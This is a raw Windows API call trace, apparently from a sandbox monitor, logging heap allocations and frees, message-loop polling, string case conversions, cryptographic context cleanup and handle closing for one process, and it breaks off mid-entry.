PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.132] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.133] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.133] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.133] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.133] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.133] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.136] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0266.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.137] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.137] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.137] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.137] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.137] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.137] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.137] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.138] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.138] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.138] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.138] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.138] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.138] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.138] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.139] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.139] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.139] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.139] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.140] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.140] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.140] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.140] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.140] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.140] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.140] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.140] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.140] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.140] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.140] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.140] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.140] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.140] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.140] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.140] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.141] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.141] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.141] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.141] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.141] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.141] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.141] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.141] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.141] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.141] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.141] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.141] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.141] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.141] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.141] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.141] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.142] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.142] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.142] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.143] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.144] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.144] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.144] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.144] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0266.144] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.145] FreeLibrary (hLibModule=0x74d40000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.145] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.145] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.146] CloseHandle (hObject=0x2a0) returned 1 [0266.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 